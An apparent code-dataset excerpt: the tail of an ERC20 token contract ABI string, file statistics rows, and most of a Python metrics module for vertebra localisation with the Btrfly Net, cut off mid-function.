","name":"validityStartTimestamp","type":"uint128"},{"internalType":"uint128","name":"validityEndTimestamp","type":"uint128"},{"internalType":"bytes32","name":"uid","type":"bytes32"}],"indexed":false,"internalType":"struct 
ITokenERC20.MintRequest","name":"mintRequest","type":"tuple"}],"name":"TokensMintedWithSignature","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"}],"name":"Unpaused","type":"event"},{"inputs":[],"name":"DEFAULT_ADMIN_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"DOMAIN_SEPARATOR","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burnFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"in
ternalType":"uint32","name":"pos","type":"uint32"}],"name":"checkpoints","outputs":[{"components":[{"internalType":"uint32","name":"fromBlock","type":"uint32"},{"internalType":"uint224","name":"votes","type":"uint224"}],"internalType":"struct ERC20VotesUpgradeable.Checkpoint","name":"","type":"tuple"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"contractType","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"contractURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"contractVersion","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"delegatee","type":"address"}],"name":"delegate","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"delegatee","type":"address"},{"internalType":"uint256","name":"nonce","type":"uint256"},{"internalType":"uint256","name":"expiry","type":"uint256"},{"internalType":"uint8","name":"v","type":"uint8"},{"internalType":"bytes32","name":"r","type":"bytes32"},{"internalType":"bytes32","name":"s","type":"bytes32"}],"name":"delegateBySig","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"delegates","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inpu
ts":[{"internalType":"uint256","name":"blockNumber","type":"uint256"}],"name":"getPastTotalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"blockNumber","type":"uint256"}],"name":"getPastVotes","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"getPlatformFeeInfo","outputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"uint16","name":"","type":"uint16"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"}],"name":"getRoleAdmin","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"uint256","name":"index","type":"uint256"}],"name":"getRoleMember","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"}],"name":"getRoleMemberCount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"getVotes","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"grantRole","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"hasRole","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view"
,"type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_defaultAdmin","type":"address"},{"internalType":"string","name":"_name","type":"string"},{"internalType":"string","name":"_symbol","type":"string"},{"internalType":"string","name":"_contractURI","type":"string"},{"internalType":"address[]","name":"_trustedForwarders","type":"address[]"},{"internalType":"address","name":"_primarySaleRecipient","type":"address"},{"internalType":"address","name":"_platformFeeRecipient","type":"address"},{"internalType":"uint256","name":"_platformFeeBps","type":"uint256"}],"name":"initialize","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"forwarder","type":"address"}],"name":"isTrustedForwarder","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"mintTo","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"components":[{"internalType":"address","name":"to","type":"address"},{"internalType":"address","name":"primarySaleRecipient","type":"address"},{"internalType":"uint256","name":"quantity","type":"uint256"},{"internalType":"uint256","name":"price","type":"uint256"},{"internalType":"address","name":"currency","type":"address"},{"internalType":"uint128","name":"validityStartTimestamp","type":"uint128"},{"internalType":"uint128","name":"validityEndTimestamp","type":"uint128"},{"internalType":"bytes32","name":"uid","type":"bytes32"}],"internalType":"struct 
ITokenERC20.MintRequest","name":"_req","type":"tuple"},{"internalType":"bytes","name":"_signature","type":"bytes"}],"name":"mintWithSignature","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"bytes[]","name":"data","type":"bytes[]"}],"name":"multicall","outputs":[{"internalType":"bytes[]","name":"results","type":"bytes[]"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"nonces","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"numCheckpoints","outputs":[{"internalType":"uint32","name":"","type":"uint32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pause","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"paused","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"},{"internalType":"uint256","name":"deadline","type":"uint256"},{"internalType":"uint8","name":"v","type":"uint8"},{"internalType":"bytes32","name":"r","type":"bytes32"},{"internalType":"bytes32","name":"s","type":"bytes32"}],"name":"permit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"primarySaleRecipient","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"renounceRole","outputs":[],"stateMutabi
lity":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"revokeRole","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"_uri","type":"string"}],"name":"setContractURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_platformFeeRecipient","type":"address"},{"internalType":"uint256","name":"_platformFeeBps","type":"uint256"}],"name":"setPlatformFeeInfo","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_saleRecipient","type":"address"}],"name":"setPrimarySaleRecipient","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"unpause","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"com
ponents":[{"internalType":"address","name":"to","type":"address"},{"internalType":"address","name":"primarySaleRecipient","type":"address"},{"internalType":"uint256","name":"quantity","type":"uint256"},{"internalType":"uint256","name":"price","type":"uint256"},{"internalType":"address","name":"currency","type":"address"},{"internalType":"uint128","name":"validityStartTimestamp","type":"uint128"},{"internalType":"uint128","name":"validityEndTimestamp","type":"uint128"},{"internalType":"bytes32","name":"uid","type":"bytes32"}],"internalType":"struct ITokenERC20.MintRequest","name":"_req","type":"tuple"},{"internalType":"bytes","name":"_signature","type":"bytes"}],"name":"verify","outputs":[{"internalType":"bool","name":"","type":"bool"},{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]' # noqa: E501 (line-too-long)
)
# pylint: disable=too-many-lines
| 38.140158
| 16,282
| 0.641616
| 19,034
| 183,683
| 5.932804
| 0.024798
| 0.077999
| 0.044277
| 0.042506
| 0.889112
| 0.860739
| 0.833598
| 0.815054
| 0.805605
| 0.752216
| 0
| 0.005267
| 0.24551
| 183,683
| 4,815
| 16,283
| 38.148079
| 0.809564
| 0.154772
| 0
| 0.760843
| 1
| 0.000301
| 0.120437
| 0.111034
| 0
| 0
| 0
| 0
| 0.021988
| 1
| 0.090663
| false
| 0.000904
| 0.004518
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
06cf0cb4053d0096953e1c20b191f39f2c697290
| 38,616
|
py
|
Python
|
utils/metrics.py
|
lsDrizzle/Btrfly-Net-Pytorch
|
bd59a02bf94cce235a47f7ddb5e689327d0de435
|
[
"MIT"
] | 9
|
2019-11-27T06:17:21.000Z
|
2020-11-15T06:59:37.000Z
|
utils/metrics.py
|
zlinzju/Btrfly-Net-Pytorch
|
bd59a02bf94cce235a47f7ddb5e689327d0de435
|
[
"MIT"
] | 2
|
2020-04-15T07:00:05.000Z
|
2021-04-02T02:35:23.000Z
|
utils/metrics.py
|
zlinzju/Btrfly-Net-Pytorch
|
bd59a02bf94cce235a47f7ddb5e689327d0de435
|
[
"MIT"
] | 4
|
2019-10-19T13:40:00.000Z
|
2020-11-09T15:54:13.000Z
|
import torch
import numpy as np
import json
import cv2
# Maps the index of a direction vector's dominant (+/-1) component to the
# anatomical axis letter it represents; used by create_centroid_pos.
Dic = {0:'Z',1:'Y',2:'X'}
@torch.no_grad()
def decom(whole_dict):
    """Decompose a list of centroid dicts into four parallel lists.

    :param whole_dict: sequence of dicts, each with keys 'label', 'X', 'Y', 'Z'
    :return: tuple (labels, dim_X, dim_Y, dim_Z), each a list in input order
    """
    # Comprehensions replace the original index-based loop with four appends.
    label = [entry['label'] for entry in whole_dict]
    dim_X = [entry['X'] for entry in whole_dict]
    dim_Y = [entry['Y'] for entry in whole_dict]
    dim_Z = [entry['Z'] for entry in whole_dict]
    return label, dim_X, dim_Y, dim_Z
@torch.no_grad()
def create_centroid_pos(Direction, Spacing, Size, position):
    # dim0, dim1,dim2, label):
    """
    :param Direction,Spacing, Size: from sitk raw.GetDirection(),GetSpacing(),GetSize()
    :param position:[24,3]
    :return:
    """
    # Local copy of the module-level axis-name table (index of the dominant
    # +/-1 component in a direction row -> anatomical axis letter).
    axis_names = {0: 'Z', 1: 'Y', 2: 'X'}
    direction = np.round(list(Direction))
    # Rows k=0,1,2 give slices [0:7:3], [1:8:3], [2:9:3] of the 3x3 direction
    # matrix, exactly as the original direc0/direc1/direc2.
    axes = [direction[k:k + 7:3] for k in range(3)]
    chars = [axis_names[np.argwhere(np.abs(ax) == 1)[0][0]] for ax in axes]
    resolution = Spacing
    extents = (Size[0], Size[1], Size[2])

    def to_world(coord, extent, res, axis_vec, axis_char):
        # The original four-way nesting flips the coordinate exactly when the
        # axis sign (-1 vs. anything else) disagrees with the 'X'-axis test,
        # i.e. keep coord*res iff (sum == -1) == (char == 'X').
        if (np.sum(axis_vec) == -1) == (axis_char == 'X'):
            return coord * res
        return (extent - coord) * res

    jsonlist = []
    for i in range(24):
        coords = [position[i:i + 1, k] for k in range(3)]
        # Negative dim0 marks a vertebra that was not detected; skip it.
        if coords[0] >= 0:
            entry = {
                chars[k]: to_world(coords[k], extents[k], resolution[k], axes[k], chars[k])
                for k in range(3)
            }
            entry['label'] = i + 1
            jsonlist.append(entry)
    return jsonlist
@torch.no_grad()
def Get_Identification_Rate(ground_truth_list: object, pred_list: object) -> object:
    """Identification rate over a batch of subjects.

    :param ground_truth_list: per-subject lists of centroid dicts
        ({'X': ..., 'Y': ..., 'Z': ..., 'label': ...})
    :param pred_list: same structure, predicted centroids
    :return: (correct / #predictions, correct / #ground-truth). A prediction
        counts as correct when its label exists in the ground truth and the
        3-D Euclidean distance is below 20. Both ratios fall back to 0 on
        empty input (the original raised ZeroDivisionError when the ground
        truth was empty).
    """
    correctpred = 0
    whole_number = 0
    whole_number_gt = 0
    for i in range(len(pred_list)):
        label_GT, dim_X_GT, dim_Y_GT, dim_Z_GT = decom(ground_truth_list[i])
        label_PRED, dim_X_PRED, dim_Y_PRED, dim_Z_PRED = decom(pred_list[i])
        whole_number += len(label_PRED)
        whole_number_gt += len(label_GT)
        for idx, label_c in enumerate(label_PRED):
            if label_c not in label_GT:
                continue
            pos = label_GT.index(label_c)
            dif_X = dim_X_GT[pos] - dim_X_PRED[idx]
            dif_Y = dim_Y_GT[pos] - dim_Y_PRED[idx]
            dif_Z = dim_Z_GT[pos] - dim_Z_PRED[idx]
            distance = (dif_X ** 2 + dif_Y ** 2 + dif_Z ** 2) ** 0.5
            if distance < 20:
                correctpred += 1
    iden_rate = correctpred / whole_number if whole_number != 0 else 0
    # Guard added: mirror the whole_number guard for the GT denominator.
    iden_rate_gt = correctpred / whole_number_gt if whole_number_gt != 0 else 0
    return iden_rate, iden_rate_gt
@torch.no_grad()
def Get_Localisation_distance(ground_truth, pred):
    """Mean 3-D Euclidean distance between predicted and ground-truth
    centroids that share a label, for one subject.

    :param ground_truth: list of centroid dicts for one subject
    :param pred: list of predicted centroid dicts for the same subject
    :return: mean distance over matched labels, or an empty list when no
        predicted label occurs in the ground truth (legacy sentinel kept for
        backward compatibility with callers that test for it)
    """
    hit = 0
    distance = 0
    label_GT, dim_X_GT, dim_Y_GT, dim_Z_GT = decom(ground_truth)
    label_PRED, dim_X_PRED, dim_Y_PRED, dim_Z_PRED = decom(pred)
    for idx, label_c in enumerate(label_PRED):
        if label_c in label_GT:
            hit += 1
            pos = label_GT.index(label_c)
            dif_X = dim_X_GT[pos] - dim_X_PRED[idx]
            dif_Y = dim_Y_GT[pos] - dim_Y_PRED[idx]
            dif_Z = dim_Z_GT[pos] - dim_Z_PRED[idx]
            # Bug fix: the original summed dif_Y squared twice and never used
            # dif_Z, mis-measuring the distance along the third axis.
            distance += (dif_X ** 2 + dif_Y ** 2 + dif_Z ** 2) ** 0.5
    if hit == 0:
        print('ALL MISSED')
        loc_dis = []
    else:
        loc_dis = distance / hit
    return loc_dis
@torch.no_grad()
def Get_Recall_AND_Precision(ground_truth, pred):
    """Recall and precision of centroid detection for one subject.

    A hit is a predicted label present in the ground truth whose centroid
    lies within a 3-D distance of 20 of the ground-truth centroid.

    :param ground_truth: list of centroid dicts for one subject
    :param pred: list of predicted centroid dicts for the same subject
    :return: (recall, precision) = (hits / len(GT), hits / len(PRED));
        each ratio is 0 when its denominator is empty (the original raised
        ZeroDivisionError in that case)
    """
    hit = 0
    label_GT, dim_X_GT, dim_Y_GT, dim_Z_GT = decom(ground_truth)
    label_PRED, dim_X_PRED, dim_Y_PRED, dim_Z_PRED = decom(pred)
    GT_length = len(label_GT)
    PRED_length = len(label_PRED)
    for idx, label_c in enumerate(label_PRED):
        if label_c in label_GT:
            pos = label_GT.index(label_c)
            dif_X = dim_X_GT[pos] - dim_X_PRED[idx]
            dif_Y = dim_Y_GT[pos] - dim_Y_PRED[idx]
            dif_Z = dim_Z_GT[pos] - dim_Z_PRED[idx]
            distance = (dif_X ** 2 + dif_Y ** 2 + dif_Z ** 2) ** 0.5
            if distance < 20:
                hit += 1
    # Guards added for empty inputs.
    Recall = hit / GT_length if GT_length != 0 else 0
    Precision = hit / PRED_length if PRED_length != 0 else 0
    return Recall, Precision
@torch.no_grad()
def pred_pos(device, output_sag_batch, output_cor_batch, direction, crop_info, spacing, cor_pad, sag_pad):
    """
    Compute the tensor product between output_sag and output_cor,
    then use argmax to find the position of the ith vertebra in channel i.
    Let's say the original 3D data has a shape of (B, C, d0, d1, d2), normally with C=25.
    Parameters:
        device: unused in this function; presumably kept so the pred_pos*
            variants share one signature - TODO confirm with callers
        output_sag & output_cor: output of the Btrfly Net (2D heatmap stacks)
        direction: per-subject axis order; each subject must be
            ('Z', 'Y', 'X') or ('Y', 'X', 'Z')
        crop_info: dict with a 'displace' tensor added back to each coordinate
        spacing: per-axis scale the voxel coordinates are divided by
        cor_pad & sag_pad: per-subject paddings stripped from the 2D views
    Return:
        a (T x B x C x 4) tensor (T = number of thresholds swept) holding
        x, y, z and the peak confidence per vertebra; coordinates whose peak
        confidence is <= the threshold are mapped to negative values
        (coord -> -coord - 1) so they can be filtered by sign downstream
        (create_centroid_pos keeps only rows with dim0 >= 0)
    """
    if output_sag_batch.shape[:2] != output_cor_batch.shape[:2]:
        raise Exception("output_sag and output_cor have different batch sizes or channel numbers!")
    B, C = output_sag_batch.shape[0], output_sag_batch.shape[1]
    # threshold to reduce noise
    threshold_noise = 0
    # Confidence thresholds swept: 40 values in [0, 0.4); one output slice each.
    threshold_label = torch.from_numpy(np.arange(0, 0.4, 0.01)).float()
    position_batch = torch.Tensor(len(threshold_label), B, C, 4)
    resolution = 1.0
    # Un-padded ("original") per-subject extents of the three axes.
    ori_d0, ori_d1, ori_d2 = np.zeros(B), np.zeros(B), np.zeros(B)
    for i in range(B):
        direc = (direction[0][i], direction[1][i], direction[2][i])
        # '&' works here because tuple comparisons yield plain bools.
        if (direc != ('Z', 'Y', 'X')) & (direc != ('Y', 'X', 'Z')):
            raise Exception('Unknown direction!')
        # select ith subject
        output_cor = output_cor_batch[i, :, :, :]
        output_sag = output_sag_batch[i, :, :, :]
        # reduce the noise according to threshold
        reduce_noise_sag = torch.where(output_sag < threshold_noise, torch.full_like(output_sag, 0), output_sag)
        reduce_noise_cor = torch.where(output_cor < threshold_noise, torch.full_like(output_cor, 0), output_cor)
        max_value, max_idx = torch.zeros(24), torch.zeros(24)
        if direc == ('Z', 'Y', 'X'):
            # sag:(C, d1, d2), cor:(C, d0, d2)
            if (output_sag.shape[2] != output_cor.shape[2]):
                raise Exception("sag and cor should have an identical size in the last dimension!")
            d0, d1, d2 = output_cor.shape[1], output_sag.shape[1], output_sag.shape[2]
            ori_d0[i], ori_d1[i], ori_d2[i] = d0 - cor_pad[2][i] - cor_pad[3][i], d1 - sag_pad[2][i] - sag_pad[3][i], d2 - cor_pad[0][i] - cor_pad[1][i]
            #extend them to (d0, d1, d2)
            for c_num in range(24):
                # Strip padding from each 2D view, then broadcast both into the
                # same (d0, d1, d2) volume and multiply: the product is high
                # only where the two views agree.
                reduce_noise_sag_one_cha = reduce_noise_sag[c_num, sag_pad[2][i]:d1-sag_pad[3][i], sag_pad[0][i]:d2-sag_pad[1][i]]
                reduce_noise_cor_one_cha = reduce_noise_cor[c_num, cor_pad[2][i]:d0-cor_pad[3][i], cor_pad[0][i]:d2-cor_pad[1][i]]
                assert reduce_noise_cor_one_cha.shape[1] == reduce_noise_sag_one_cha.shape[1]
                reduce_noise_sag_one_cha = reduce_noise_sag_one_cha.unsqueeze(0).expand(int(ori_d0[i]), int(ori_d1[i]), int(ori_d2[i]))
                reduce_noise_cor_one_cha = reduce_noise_cor_one_cha.unsqueeze(1).expand(int(ori_d0[i]), int(ori_d1[i]), int(ori_d2[i]))
                product = reduce_noise_cor_one_cha * reduce_noise_sag_one_cha
                # find maximum value for each batch and channel
                max_value[c_num], max_idx[c_num] = torch.max(product.view(-1), dim=0)
        else:
            # sag:(C, d0, d1), cor:(C, d1, d2)
            if (output_sag.shape[2] != output_cor.shape[1]):
                raise Exception("sag and cor should have an identical size in some dimension!")
            d0, d1, d2 = output_sag.shape[1], output_sag.shape[2], output_cor.shape[2]
            ori_d0[i], ori_d1[i], ori_d2[i] = d0 - sag_pad[2][i] - sag_pad[3][i], d1 - sag_pad[0][i] - sag_pad[1][i], d2 - cor_pad[0][i] - cor_pad[1][i]
            #extend them to (d0, d1, d2)
            for c_num in range(24):
                # Same broadcast-and-multiply as above, with the axes the two
                # views cover shifted for this direction convention.
                reduce_noise_sag_one_cha = reduce_noise_sag[c_num, sag_pad[2][i]:d0 - sag_pad[3][i], sag_pad[0][i]:d1 - sag_pad[1][i]]
                reduce_noise_cor_one_cha = reduce_noise_cor[c_num, cor_pad[2][i]:d1 - cor_pad[3][i], cor_pad[0][i]:d2 - cor_pad[1][i]]
                assert reduce_noise_cor_one_cha.shape[0] == reduce_noise_sag_one_cha.shape[1]
                reduce_noise_sag_one_cha = reduce_noise_sag_one_cha.unsqueeze(2).expand(int(ori_d0[i]), int(ori_d1[i]), int(ori_d2[i]))
                reduce_noise_cor_one_cha = reduce_noise_cor_one_cha.unsqueeze(0).expand(int(ori_d0[i]), int(ori_d1[i]), int(ori_d2[i]))
                product = reduce_noise_cor_one_cha * reduce_noise_sag_one_cha
                # find maximum value for each batch and channel
                max_value[c_num], max_idx[c_num] = torch.max(product.view(-1), dim=0)
        # translate the indexes to 3D form
        max_idx_x, max_idx_y, max_idx_z = -torch.ones(24), -torch.ones(24), -torch.ones(24)
        for c_num in range(24):
            # Unflatten: flat = x * (ori_d1 * ori_d2) + y * ori_d2 + z.
            max_idx_x[c_num], max_idx_y[c_num], max_idx_z[c_num] = \
                max_idx[c_num] // (ori_d1[i] * ori_d2[i]), \
                (max_idx[c_num] % (ori_d1[i] * ori_d2[i])) // ori_d2[i], \
                (max_idx[c_num] % (ori_d1[i] * ori_d2[i])) % ori_d2[i]
        for step in range(len(threshold_label)):
            # Rescale to world-ish coordinates, undo the crop displacement,
            # then flip sub-threshold entries negative: coord -> -coord - 1.
            position_batch[step, i, :, 0] = (max_idx_x.float() * resolution / spacing[0][i] + crop_info['displace'][i, 0, 0])\
                                            * (2 * (max_value > threshold_label[step]).float() - 1) \
                                            - (max_value <= threshold_label[step]).float()
            position_batch[step, i, :, 1] = (max_idx_y.float() * resolution / spacing[1][i] + crop_info['displace'][i, 0, 1])\
                                            * (2 * (max_value > threshold_label[step]).float() - 1) \
                                            - (max_value <= threshold_label[step]).float()
            position_batch[step, i, :, 2] = (max_idx_z.float() * resolution / spacing[2][i] + crop_info['displace'][i, 0, 2])\
                                            * (2 * (max_value > threshold_label[step]).float() - 1) \
                                            - (max_value <= threshold_label[step]).float()
            position_batch[step, i, :, 3] = max_value
    return position_batch
@torch.no_grad()
def pred_pos_2(device, output_sag_batch, output_cor_batch, direction, crop_info, spacing, cor_pad, sag_pad):
    """
    Variant of pred_pos that skips building the full 3D product volume:
    each 2D view is reduced independently with a per-channel argmax, and the
    shared axis takes its coordinate from whichever view has the stronger
    peak. Note resolution is 2.0 here (1.0 in pred_pos).
    Parameters:
        device: unused in this function; presumably kept for a uniform
            signature across the pred_pos* variants - TODO confirm
        output_sag & output_cor: output of the Btrfly Net (2D heatmap stacks)
        direction: per-subject axis order; each subject must be
            ('Z', 'Y', 'X') or ('Y', 'X', 'Z')
        crop_info: dict with a 'displace' tensor added back to each coordinate
        spacing: per-axis scale the voxel coordinates are divided by
        cor_pad & sag_pad: per-subject paddings stripped from the 2D views
    Return:
        a (T x B x C x 4) tensor (T = number of thresholds swept) holding
        x, y, z and the peak confidence per vertebra; sub-threshold entries
        are flipped negative (coord -> -coord - 1) for downstream filtering
    """
    if output_sag_batch.shape[:2] != output_cor_batch.shape[:2]:
        raise Exception("output_sag and output_cor have different batch sizes or channel numbers!")
    B, C = output_sag_batch.shape[0], output_sag_batch.shape[1]
    # threshold to reduce noise
    threshold_noise = 0
    threshold_label = torch.from_numpy(np.arange(0, 0.4, 0.01)).float()
    position_batch = torch.Tensor(len(threshold_label), B, C, 4)
    resolution = 2.0
    ori_d0, ori_d1, ori_d2 = np.zeros(B), np.zeros(B), np.zeros(B)
    for i in range(B):
        direc = (direction[0][i], direction[1][i], direction[2][i])
        # '&' works here because tuple comparisons yield plain bools.
        if (direc != ('Z', 'Y', 'X')) & (direc != ('Y', 'X', 'Z')):
            raise Exception('Unknown direction!')
        # select ith subject
        output_cor = output_cor_batch[i, :, :, :]
        output_sag = output_sag_batch[i, :, :, :]
        # reduce the noise according to threshold
        reduce_noise_sag = torch.where(output_sag < threshold_noise, torch.full_like(output_sag, 0), output_sag)
        reduce_noise_cor = torch.where(output_cor < threshold_noise, torch.full_like(output_cor, 0), output_cor)
        max_value, max_idx = torch.zeros(24), torch.zeros(24)
        max_idx_x, max_idx_y, max_idx_z = torch.zeros(24), torch.zeros(24), torch.zeros(24)
        if direc == ('Z', 'Y', 'X'):
            # sag:(C, d1, d2), cor:(C, d0, d2)
            if (output_sag.shape[2] != output_cor.shape[2]):
                raise Exception("sag and cor should have an identical size in the last dimension!")
            d0, d1, d2 = output_cor.shape[1], output_sag.shape[1], output_sag.shape[2]
            ori_d0[i], ori_d1[i], ori_d2[i] = d0 - cor_pad[2][i] - cor_pad[3][i], d1 - sag_pad[2][i] - sag_pad[3][i], d2 - cor_pad[0][i] - cor_pad[1][i]
            # Strip padding from each whole-channel view.
            reduce_noise_sag_no_padding = reduce_noise_sag[:, sag_pad[2][i]:d1-sag_pad[3][i], sag_pad[0][i]:d2-sag_pad[1][i]]
            reduce_noise_cor_no_padding = reduce_noise_cor[:, cor_pad[2][i]:d0-cor_pad[3][i], cor_pad[0][i]:d2-cor_pad[1][i]]
            # (24)
            max_value_sag, max_idx_sag = torch.max(reduce_noise_sag_no_padding.contiguous().view(reduce_noise_sag_no_padding.shape[0], -1), dim=1)
            max_value_cor, max_idx_cor = torch.max(reduce_noise_cor_no_padding.contiguous().view(reduce_noise_cor_no_padding.shape[0], -1), dim=1)
            # Unflatten each view's argmax into (row, col) within its plane.
            max_idx_sag_x, max_idx_sag_y = max_idx_sag // ori_d2[i], max_idx_sag % ori_d2[i]
            max_idx_cor_x, max_idx_cor_y = max_idx_cor // ori_d2[i], max_idx_cor % ori_d2[i]
            for c_num in range(24):
                # x comes from cor rows, y from sag rows; the shared d2 axis
                # (z) is taken from whichever view peaked higher.
                if max_value_sag[c_num] > max_value_cor[c_num]:
                    max_idx_x[c_num], max_idx_y[c_num], max_idx_z[c_num] = max_idx_cor_x[c_num], max_idx_sag_x[c_num], max_idx_sag_y[c_num]
                    max_value[c_num] = max_value_sag[c_num]
                else:
                    max_idx_x[c_num], max_idx_y[c_num], max_idx_z[c_num] = max_idx_cor_x[c_num], max_idx_sag_x[c_num], max_idx_cor_y[c_num]
                    max_value[c_num] = max_value_cor[c_num]
        else:
            # sag:(C, d0, d1), cor:(C, d1, d2)
            if (output_sag.shape[2] != output_cor.shape[1]):
                raise Exception("sag and cor should have an identical size in some dimension!")
            d0, d1, d2 = output_sag.shape[1], output_sag.shape[2], output_cor.shape[2]
